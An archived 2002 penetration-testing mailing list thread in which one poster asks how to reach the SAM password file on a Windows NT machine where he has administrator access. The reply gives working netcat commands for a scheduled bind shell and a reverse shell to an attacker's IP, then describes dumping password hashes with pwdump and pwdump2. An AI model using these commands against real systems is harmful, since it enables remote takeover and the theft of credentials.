Penetration Testing mailing list archives
RE: Access to a win NT box
From: "Panos Dimitriou" <p.dimitriou () encode-sec com>
Date: Wed, 26 Jun 2002 19:23:10 +0300
You can always upload any tool you like, such as pwdump, and then you just have to execute it. In order to execute it you can: 1. upload netcat (nc.exe) 2. execute "net time \\target" 3. schedule a job like: at \\target 7:14P ""c:\nc.exe -L -p 2222 -e cmd.exe and then establish a connection (with netcat preferably) to port 2222 or, if the system is firewalled at \\target 7:14P ""c:\nc.exe [your IP] 80 -e cmd.exe and have a netcat listening on port 80 (nc -L -p 80)in order to establish a reverse shell. After gaining a shell on the system execute pwdump and download the results. Furthermore, if you use pwdump2 you can extract the passwords even if the SAM is SYSKEY protected. I hope this helped ________________________ Panos Dimitriou Director, Managed Security Services _________________________ ENCODE S.A. 3, R. Melodou str. 151 25 Marousi Athens, Greece _________________________ E Tel.: +30 (1) 6178410 E Fax.: +30 (1) 6109579 s p.dimitriou () encode-sec com " www.encode-sec.com _________________________ -----Original Message----- From: Pedro Miranda [mailto:rpmiranda () sonae pt] Sent: Tuesday, June 25, 2002 7:43 PM To: pen-test () securityfocus com Subject: Access to a win NT box Hi, I've got remote access to a wNT box using the command \\machinename\c$ /user:machinename\administrator So i've got administrator privileges but i want to access to the SAM database. I've tried to get \\winnt\repair\sam._ but i couldn't find the rdisk comand. Can anybody help tell me where can i find this software, or if there is another way to get access to the sam file. Thanks in advance ------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Access to a win NT box Pedro Miranda (Jun 26)
- RE: Access to a win NT box Marlon Jabbur (Jun 28)
- RE: Access to a win NT box Panos Dimitriou (Jun 28)
- <Possible follow-ups>
- RE: Access to a win NT box Davis, Matt (Jun 28)
- RE: Access to a win NT box Mark Maher (Jun 28)
- RE: Access to a win NT box Shackleford, Dave (Jun 28)